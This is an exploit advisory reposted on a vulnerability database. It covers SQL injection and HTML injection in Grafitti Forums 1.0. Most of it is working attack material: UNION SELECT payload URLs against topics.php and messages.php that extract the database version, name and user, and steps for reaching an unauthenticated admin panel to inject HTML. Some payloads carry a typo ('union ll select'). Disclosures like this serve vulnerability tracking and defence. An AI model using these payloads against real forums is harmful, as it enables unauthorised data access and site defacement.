Lucene search

K
seebugRootSSV:9475
HistorySep 12, 2008 - 12:00 a.m.

Grafitti Forums 1.0 Remote SQL Injection/HTML Injection Vulnerabilities

2008-09-1200:00:00
Root
www.seebug.org
10

No description provided by source.


                                                ############################################################################################################
[+] Grafitti Forums v1.0 Remote SQL Injection/HTML Injection
[+] Discovered By SirGod                       
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke                      
############################################################################################################

 [+] Remote SQL Injection Vulnerabilities


   PoC :

    http://[target]/[path]/topics.php?f=[SQL]
 
   Example :

     http://127.0.0.1/topics.php?f=-1 union all select version()--
     http://127.0.0.1/topics.php?f=-1 union ll select database()--
     http://127.0.0.1/topics.php?f=-1 union all select user()--

   PoC :

    http://[target]/[path]/messages.php?t=[SQL]

   Example :

    http://127.0.0.1/messages.php?t=-1 union all select version()--
    http://127.0.0.1/messages.php?t=-1 union ll select database()--
    http://127.0.0.1/messages.php?t=-1 union all select user()--


  [+] HTML Injection

      1. Just go to :

        http://[target]/[path]/admin.php

      2. No Authentication Required !
 
      3. Click Add Forum .

      4. Complete the forum name : Owned etc.. 50 chars maximum. (also you can use HTML Code) .

      5. Complete the forum description with any HTML Code (100 chars max) .

############################################################################################################